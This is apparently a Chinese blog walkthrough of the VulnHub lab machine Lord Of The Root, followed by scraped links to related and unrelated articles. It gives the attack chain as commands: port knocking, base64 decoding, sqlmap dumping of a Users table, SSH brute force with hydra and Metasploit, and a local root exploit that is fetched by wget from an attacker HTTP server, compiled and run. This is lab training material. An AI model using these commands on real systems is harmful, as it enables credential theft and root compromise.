开放22端口,ssh连接尝试

ssh 192.168.19.174

提示1,2,3 意在端口碰撞

没有knock命令需要先安装


另一种命令

安装不成功时需要换源见尾部内容

安装完成后使用

knock 192.168.19.174 1 2 3 -v

再次扫描全端口,发现1337端口

访问1337端口,发现一张图片,没什么价值

访问robots.txt文件

查看源码,发现一串字符(base64编码)

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

另一种解码方式

echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d

发现还有一层,继续解码

Lzk3ODM0NTIxMC9pbmRleC5waHA=

发现网站首页,访问查看

是一个登录界面

尝试sql注入

直接利用sqlmap跑

sqlmap -u "http://192.168.19.174:1337/978345210/index.php" --forms

一路回车即可

可以看到最下面,提到又基于时间的盲注漏洞

尝试爆库

sqlmap -u "http://192.168.19.174:1337/978345210/index.php" --forms  --dbs

爆出来四个数据库

[*] information_schema

[*] mysql

[*] performance_schema

[*] Webapp

针对Webapp数据库进行爆破里面的表

sqlmap -o -u "http://192.168.19.174:1337/978345210/index.php" --forms -D Webapp --tables

发现一个表Users

爆破字段名

sqlmap -o -u "http://192.168.19.174:1337/978345210/index.php" --forms -D Webapp -T Users --columns

爆破字段内容信息

sqlmap -o -u "http://192.168.19.174:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump

将拿到的用户名密码字段写入字典user.txt和password.txt中

第一种hydra爆破

hydra -L user.txt -P password.txt 192.168.19.174 ssh

第二种msf爆破

msfconsole

search ssh_login

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.19.174

set user_file /root/lordoftheroot/user.txt

set pass_file /root/lordoftheroot/password.txt

set stop_on_success true

ssh 登录

提权

searchsploit 39166.c

locate linux/local/40847.cpp  有时候这个命令不灵

cp /usr/share/exploitdb/exploits/linux/local/39166.c ./

python -m SimpleHTTPServer 8081

wget http://192.168.19.147:8081/39166.c

gcc 39166.c -o lordoftheroot

chmod +x lordoftheroot

./lordoftheroot

cd /root

cat Flag.txt

lordoftheroot相关推荐

  1. 靶机渗透练习43-Lord Of The Root

    靶机描述 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ Description I created this machine ...

  2. vulnhub靶场之 LordOfTheRoot_1.0.1

    LordOfTheRoot_1.0.1 namp简单使用 namp 192.168.5.0/24 -sP 探测目标主机存活情况 namp 192.168.5.0/24 -O 识别操作系统 namp 1 ...

最新文章

  1. 数据流分析:可用表达式的计算+活跃变量计算+到达定值。
  2. JVM 监控以及内存分析
  3. python改变numpy数据类型_numpy-Python Pandas-将某些列类型更改为类别
  4. 中如何调取api_API(接口)是什么
  5. linux切换root报错,Linux用户切换到root后运行图形程序报错(*GLib-GIO-CRITICAL **)
  6. PHP项目中,记录错误日志
  7. php+换行+php+eol,PHP PHP_EOL 换行符
  8. 前端学习(763):变量属性函数方法的区别
  9. shiro学习(8):shiro连接数据库 三
  10. switch(封装)
  11. ASP.NET中Server.MapPath() 和Request.MapPath()使用
  12. C#看书笔记_02 核心C#
  13. xampp 支持pdo mysql_XAMPP PDO Mysql server连接配置
  14. 凸优化第九章无约束优化 作业题
  15. 户籍管理系统的设计与实现
  16. 关于Access2003的安装和下载
  17. 江苏省等保测评机构项目测评收费价格标准参考
  18. 7种大屏设计与布局思路,你不知道就亏了
  19. vue获取地址栏参数
  20. Linux 中复制问题,错误显示 cp:omitting directory

热门文章

  1. 一个带浮动按钮的布局
  2. Outlook中撤回已发送的邮件
  3. Vue.js-Day08【项目实战(附带 完整项目源码)-day03:订单确认页面、美团支付页面、flex弹性盒子布局】
  4. linux——基本工具:gcc/g++,make(makefile)与gdb
  5. 常用python执行shell的命令
  6. 数据分析之常见图表类型与应用
  7. Python线程池的使用方法
  8. wagon-maven-plugin 实现远程部署
  9. 怎么赚钱快?只要不是这三种人,都可以赚到钱!
  10. 安卓13又来了?快!扶起我来!